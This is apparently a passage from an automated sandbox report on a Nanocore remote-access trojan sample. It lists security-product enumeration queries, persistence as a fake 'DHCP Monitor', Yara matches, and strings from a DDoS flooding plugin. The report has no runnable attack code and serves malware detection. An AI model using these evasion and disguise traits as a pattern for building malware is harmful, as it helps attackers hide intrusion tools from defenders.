        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' Jump to behavior
        Source: bGf2H3tXGg.exe, 00000003.00000002.491387515.0000000002695000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: bGf2H3tXGg.exe, 00000003.00000002.488115189.0000000000DC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: bGf2H3tXGg.exe, 00000003.00000002.488115189.0000000000DC0000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: bGf2H3tXGg.exe, 00000003.00000002.488115189.0000000000DC0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
        Source: bGf2H3tXGg.exe, 00000003.00000002.488115189.0000000000DC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
        Source: bGf2H3tXGg.exe, 00000003.00000002.488115189.0000000000DC0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: bGf2H3tXGg.exe, 00000003.00000002.490038547.0000000002548000.00000004.00000001.sdmpBinary or memory string: Program Manager`
        Source: bGf2H3tXGg.exe, 00000003.00000002.492942931.00000000029A7000.00000004.00000001.sdmpBinary or memory string: Program ManagerHa
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_0040208D cpuid 3_2_0040208D
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 3_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00401B74
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339201684.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORY
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: bGf2H3tXGg.exe, 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: bGf2H3tXGg.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceM